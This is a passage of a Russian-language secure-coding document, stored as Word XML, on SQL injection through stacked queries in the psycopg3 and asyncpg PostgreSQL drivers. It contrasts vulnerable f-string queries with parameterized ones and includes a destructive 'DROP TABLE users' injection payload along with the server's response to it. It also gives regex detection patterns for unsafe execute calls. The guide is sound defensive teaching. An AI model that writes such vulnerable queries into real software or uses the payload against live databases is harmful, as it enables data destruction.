        <w:t>psycopg.sql.SQL("SELECT * FROM {}").format(sql.Identifier(table_name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2383BC8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   При миграции с psycopg2: SQL-строки вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"SET search_path TO foo; SELECT ..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нужно разбивать на два </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — psycopg3 примет это, но в текст-режиме (без params) сохраняет уязвимость, если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть пользовательский ввод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE558BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В коде судьи: те же паттерны, что для psycopg2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute\(f"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute\(".*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cursor.execute\(".*%\s*\w+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A63F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429C6A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>psycopg3 ≥ 3.0 (релиз 2021) — поведение стабильное. До 3.0 драйвер не существовал. Миграция с psycopg2 на psycopg3 — отдельная задача (см. официальный гайд), но с точки зрения защиты от stacked queries — психологически: если код был корректным в psycopg2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + params), он останется корректным в psycopg3 и получит дополнительный уровень защиты через extended-protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B60ED8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60642DB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   psycopg3 docs: «Differences from psycopg2» — https://www.psycopg.org/psycopg3/docs/basic/from_pg2.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A96A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   psycopg3 docs: «Server-side parameters binding» — https://www.psycopg.org/psycopg3/docs/basic/params.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B16D77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   psycopg3 docs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepare_threshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.psycopg.org/psycopg3/docs/api/connections.html#psycopg.Connection.prepare_threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C13317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md, строки 332–333)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1D06C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.3 asyncpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63359B9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> asyncpg (актуальная ветка 0.30.x) — нативный асинхронный драйвер, написан на Cython, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не использует libpq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — реализует wire-protocol PostgreSQL напрямую. Логика выбора протокола: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.execute(sql, *args)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с хотя бы одним arg → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">extended </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>protocol всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Parse + Bind + Execute), причём с server-side prepared statement и автоматическим кэшированием по SQL-тексту. Без args — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уходит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через одно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>-сообщение. У asyncpg нет client-side mogrify/экранирования вообще: либо параметры через wire ($1, $2), либо raw SQL без какой-либо обработки клиентом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9FFB2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0673D414" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import asyncpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BB7DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E986C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_users(conn: asyncpg.Connection, name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3826B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rows = await conn.fetch(f"SELECT id, email FROM users WHERE name = '{name}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0EF05A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427905A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>f-string-конкатенация без args. asyncpg не имеет промежуточной стадии экранирования — строка уходит на сервер как есть через simple-protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD996A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527542DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_users(conn: asyncpg.Connection, name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7792C29E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rows = await conn.fetch("SELECT id, email FROM users WHERE name = $1", name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441194A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60740951" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нативный placeholder PostgreSQL (asyncpg не использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> передаётся как arg → asyncpg формирует Parse-сообщение с одной командой и Bind-сообщение со значением.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9655AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48617AE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3E9F2"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3722CB72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 1: simple (уязвимый код, без args).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3A8C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CEEEBA"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21A928E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оба statement-а исполняются. asyncpg возвращает результат только последнего statement — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не возвращает rows, поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.fetch()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отдаст пустой список, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вернёт command-tag вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>. Приложение получит «пустой ответ», таблицу — нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71928C11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 2: extended (безопасный код, с args).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E144ED4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Значение payload едет как Bind-аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20EF2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6683D10F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind:    $1 = 'x''; DROP TABLE users; --'   (текстовое значение, длина 25 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F80C21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute: возвращает 0 строк</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF64C77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если же разработчик попытается передать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри SQL-текста, передавая args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E06272" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>await conn.fetch("SELECT 1; DROP TABLE users", )  # args=()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D9AEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># или</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519DB5C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>await conn.fetch("SELECT $1; DROP TABLE users", 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A52EC1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В первом случае (args нет) — стакинг проходит (см. путь 1). Во втором (args есть) — сервер отвечает на этапе Parse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38A1B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PostgresSyntaxError: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A10ED8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">asyncpg прокинет это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asyncpg.exceptions.PostgresSyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>. Application code увидит исключение, ни одна команда не исполнилась.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3701A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что отличает asyncpg от psycopg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB06433" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Нет client-side mogrify</w:t>
      </w:r>
      <w:r>
        <w:t>. У psycopg2 параметризация — это безопасный пере-склей строки на клиенте. У psycopg3 без args — text-path с pass-through. У asyncpg без args — буквально голый simple-protocol, и наличие args — единственный признак, по которому драйвер выбирает extended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000A855" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Возвращается только последний result</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при удачном стакинге. psycopg3 даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nextset()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и видны оба результата; asyncpg прячет промежуточные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54469A5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Нет аналога `psycopg.sql.SQL()`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для безопасной композиции динамических identifiers. Если нужно подставить имя таблицы — единственный безопасный вариант — whitelist + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str.format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с предварительной валидацией (см. 3.16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D1204" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-side prepared statement cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включён по умолчанию: повторные запросы с тем же SQL переиспользуют Parse, что усиливает гарантию extended-path. Кэш ограничен (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_cache_size</w:t>
      </w:r>
      <w:r>
        <w:t>, default 100); LISTEN/NOTIFY и DDL обходят его.</w:t>
      </w:r>
    </w:p>
